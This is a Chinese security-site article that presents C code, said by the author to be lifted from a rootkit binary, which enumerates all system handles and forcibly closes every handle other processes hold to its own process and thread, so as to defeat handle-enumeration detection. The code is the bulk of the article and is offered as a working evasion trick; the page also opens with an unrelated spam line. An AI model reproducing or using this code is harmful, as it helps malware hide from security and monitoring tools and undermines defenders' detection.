自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

抹掉所有進(jìn)程中自己的句柄

作者:佚名
安全 黑客攻防
之前聽過一個(gè)檢測進(jìn)程的想法,就是暴力枚舉所有進(jìn)程中的handle,查找其中類型為PROCESS的. 此法也被爐子牛用于他的LzOpenProcess(). 下面我就寫了一斷代碼來對(duì)抗這個(gè)方法,純屬小伎倆,牛牛們飄過~

抹掉所有進(jìn)程中自己的句柄

之前聽過一個(gè)檢測進(jìn)程的想法,就是暴力枚舉所有進(jìn)程中的handle,查找其中類型為PROCESS的.

此法也被爐子牛用于他的LzOpenProcess().

下面我就寫了一斷代碼來對(duì)抗這個(gè)方法,純屬小伎倆,牛牛們飄過~

嚴(yán)格說,此段代碼不算原創(chuàng),是從某rootkit的bin中扒出來的,因此基本保留其原貌,經(jīng)我修改測試,主要函數(shù)如下:
 

void CloseAllmyHandles() 
{ 
   
  HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle; 
  HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE; 
  DWORD pid,nBufferLen=0x40000,nRetnLen=0; 
  DWORD HandleCnt,NumberOfHandles; 
  DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject; 
  CLIENT_ID myCid,tmpCid; 
  PVOID pBuffer = NULL; 
  NTSTATUS status; 
  OBJECT_ATTRIBUTES  ObjectAttributes; 
  myCid.UniqueProcess =(HANDLE)my_GetProcessId(); 
  myCid.UniqueThread=(HANDLE)my_GetThreadId(); 
  InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL ); 
  ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  printf("hMyProcess:0x%08x\n",hMyProcess); 
  printf("hMyThread :0x%08x\n",hMyThread); 
  hCurProcess = GetCurrentProcess(); 
  status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE); 
  if (!NT_SUCCESS(status)) 
  { 
    printf("Alloc Memory failed.\n"); 
    return; 
  } 
  printf("Alloced Buffer:0x%08X\n",pBuffer); 
  ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation 
  printf("Searching handles...\n"); 
  HandleCnt=*(DWORD *)pBuffer; 
  printf("Handle Count:%d\n",HandleCnt); 
  if (HandleCnt>1) 
  { 
    NumberOfHandles=*(DWORD*)pBuffer; 
    pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    {                                                 
      //printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue); 
      if ( pHandleInfo->HandleValue==(USHORT)hMyThread ) 
    { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess ) 
        { 
          pMyThreadObject = *(DWORD*)&(pHandleInfo->Object); 
          printf("Thread  finded\n"); 
        } 
      } 
      if (pHandleInfo->HandleValue==(USHORT)hMyProcess ) 
      { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 
        { 
          pMyProcessObject =*(DWORD*)&(pHandleInfo->Object); 
          printf("Process finded\n"); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
     
    } 
    while ( NumberOfHandles ); 
  } 
  ZwClose(hMyThread); 
  ZwClose(hMyProcess); 
  printf("Found my object ok.\nBegin Search and Close...\n"); 
  NumberOfHandles=HandleCnt; 
  if (HandleCnt>=1 ) 
  { 
  pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    { 
      pObject = *(DWORD*)&(pHandleInfo->Object); 
     
      if ( pMyProcessObject == pObject || pMyThreadObject == pObject ) 
      { 
        printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId); 
      tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId; 
      tmpCid.UniqueThread=0; 
      InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL ); 
      status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid); 
        //PrintZwError("ZwOpenProcess",status); 
        if (!status) 
        { 
    status=ZwDuplicateObject( 
            hSouceProcessHandle, 
            (void*)pHandleInfo->HandleValue, 
            hCurProcess, 
            &hTargetHandle, 
            0, 
            0, 
                DUPLICATE_CLOSE_SOURCE); 

  if ( !status) 
          { 
            ZwClose(hTargetHandle); 
            printf("Handle closed!\n"); 
          } 
      //PrintZwError("ZwDuplicateObject",status); 
          ZwClose(hSouceProcessHandle); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
    } 
    while ( NumberOfHandles ); 
  } 
  ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE); 
}

【編輯推薦】

  1. 如何從異常系統(tǒng)進(jìn)程檢查企業(yè)網(wǎng)絡(luò)安全
  2. 系統(tǒng)安全之利用操作系統(tǒng)自帶命令殺毒
  3. 巧妙從進(jìn)程中判斷病毒木馬
責(zé)任編輯:安泉 來源: 黑客防線
進(jìn)程安全
相關(guān)推薦

2011-03-07 17:52:51

2022-04-15 10:37:00

權(quán)限進(jìn)程UAC

2011-01-26 13:26:32

Linux進(jìn)程

2022-02-09 09:46:15

BRATA惡意程安卓

2021-10-26 10:42:49

NET進(jìn)程托管

2023-07-03 07:27:41

進(jìn)程線程Win32

2015-03-24 13:52:36

slay

2010-06-28 14:52:30

cron進(jìn)程

2016-10-28 21:30:00

AndroidJava進(jìn)程

2024-05-23 08:24:11

Android進(jìn)程開發(fā)

2020-11-17 06:52:51

架構(gòu)數(shù)據(jù)庫存儲(chǔ)

2020-09-07 07:00:09

AI 數(shù)據(jù)人工智能

2009-12-25 10:48:23

ps -aux

2010-03-31 14:36:50

Oracle進(jìn)程結(jié)構(gòu)

2022-08-16 08:42:26

macOS蘋果漏洞

2021-10-14 07:42:25

蘋果藍(lán)牙Bug

2021-09-06 14:37:19

軟件開發(fā) 技術(shù)

2010-04-06 17:52:09

Oracle SMON

2013-12-02 17:33:20

Linux進(jìn)程多線程

2016-10-17 14:09:34

原始數(shù)據(jù)大數(shù)據(jù)大數(shù)據(jù)交易
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)